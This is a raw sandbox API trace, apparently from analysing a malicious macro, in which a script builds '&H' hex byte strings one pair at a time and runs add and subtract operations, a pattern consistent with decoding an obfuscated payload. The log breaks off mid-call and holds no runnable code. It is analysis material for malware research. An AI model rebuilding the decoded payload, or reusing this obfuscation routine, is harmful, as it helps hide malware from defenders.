[0102.719] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.719] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.719] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.719] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.719] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.719] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.719] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.720] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.720] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.720] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.720] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.720] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.720] VarBstrCat (in: bstrLeft="&Ha", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.721] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.721] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.721] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.721] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.721] VarBstrCat (in: bstrLeft="&Ha", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.721] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.721] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.721] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.721] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.721] VarBstrCat (in: bstrLeft="&Ha", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.721] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.722] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.722] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.722] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.722] VarBstrCat (in: bstrLeft="&Ha", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.722] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.722] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.722] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.722] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.722] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.722] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.722] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.722] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.723] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.723] VarBstrCat (in: bstrLeft="&Ha", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.723] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.723] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.723] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.723] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.723] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.723] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.723] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.723] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.723] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.723] VarBstrCat (in: bstrLeft="&Hb", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.723] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.724] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.724] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.724] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.724] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.724] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.724] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.724] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.724] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.724] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.724] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.724] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.724] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.724] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.724] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.724] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.725] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.725] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.725] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.725] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.725] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.725] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.725] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.725] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.725] VarBstrCat (in: bstrLeft="&H3", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.725] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.725] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.725] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.725] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.725] VarBstrCat (in: bstrLeft="&H7", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.725] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.726] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.726] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.726] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.726] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.726] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.726] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.726] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.726] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.726] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.726] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.726] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.726] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.726] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.726] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.726] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.727] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.727] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.727] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.727] VarBstrCat (in: bstrLeft="&H0", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.727] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.727] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.727] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.727] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.727] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.727] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.727] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.727] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.727] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.727] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.727] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.728] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.728] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.728] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.728] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.728] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.728] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.728] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.728] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.728] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.728] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.728] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.728] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.728] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.728] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.728] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.729] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.729] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.729] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.729] VarBstrCat (in: bstrLeft="&Hb", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.729] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.729] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.729] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.729] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.729] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.729] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.729] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.729] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.729] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.729] VarBstrCat (in: bstrLeft="&Hf", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.729] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.730] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.730] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.730] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.730] VarBstrCat (in: bstrLeft="&H3", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.730] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.730] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.730] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.730] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.730] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.730] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.730] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.730] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.730] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.730] VarBstrCat (in: bstrLeft="&H3", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.730] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.731] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.731] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.731] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.731] VarBstrCat (in: bstrLeft="&H7", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.731] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.731] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.731] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.731] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.731] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.731] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.731] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.731] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.731] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.731] VarBstrCat (in: bstrLeft="&He", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.731] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.732] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.732] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.732] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.732] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.732] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.732] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.732] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.732] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.732] VarBstrCat (in: bstrLeft="&H0", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.732] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.732] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.732] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.732] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.732] VarBstrCat (in: bstrLeft="&H5", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.732] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.733] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.733] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.733] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.733] VarBstrCat (in: bstrLeft="&Hc", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.733] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.733] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.733] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.733] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.733] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.733] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.733] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.733] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.733] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.733] VarBstrCat (in: bstrLeft="&Hf", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.733] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.734] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.734] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.734] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.734] VarBstrCat (in: bstrLeft="&Hb", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.734] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.734] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.734] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.734] VarBstrCat (in: 